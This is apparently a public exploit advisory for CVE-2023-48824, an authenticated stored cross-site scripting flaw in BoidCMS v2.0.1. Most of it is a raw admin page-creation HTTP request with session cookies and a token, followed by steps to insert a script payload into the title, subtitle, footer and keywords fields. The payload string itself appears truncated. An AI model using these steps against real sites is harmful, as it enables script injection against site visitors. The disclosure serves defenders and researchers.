# Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS # Date: 13/11/2023 # Exploit Author: BugsBD Limited # Discover by: Rahad Chowdhury # Vendor Homepage: https://boidcms.github.io/#/ # Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip # Version: v2.0.1 # Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56 # CVE: CVE-2023-48824 Descriptions: BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting (XSS) Authenticated vulnerabilities in the "title, subtitle, footer, keywords" parameters of settings, create page. Steps to Reproduce: 1. Request: POST /BoidCMS/admin?page=create HTTP/1.1 Host: 192.168.1.74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------9882691211259772119227456445 Content-Length: 1492 Origin: http://192.168.1.74 Connection: close Referer: http://192.168.1.74/BoidCMS/admin?page=create Cookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20; KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k; KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc Upgrade-Insecure-Requests: 1 -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="type" post -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="title" test -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="descr" test -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="keywords" test -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="content" test -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="permalink" -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="tpl" theme.php -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="thumb" -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="date" 2023-12-02T19:41 -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="pub" true -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="token" 83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd -----------------------------9882691211259772119227456445 Content-Disposition: form-data; name="create" Create -----------------------------9882691211259772119227456445-- 2. Now use xss payload "> on "title, subtitle, footer, keywords" parameters. 3. Save and check home. ## Reproduce: [href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)